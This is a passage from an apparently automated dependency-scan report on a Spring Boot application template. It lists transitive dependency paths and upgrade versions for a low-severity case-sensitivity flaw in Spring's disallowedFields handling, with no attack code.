  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20

Overview

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.

Note:

The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.

This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.

Remediation

Upgrade org.springframework:spring-context to version 6.1.14 or higher.

References

low severity

Improper Handling of Case Sensitivity

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework.data:spring-data-commons@4.0.0-M6, org.springframework.hateoas:spring-hateoas@1.5.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
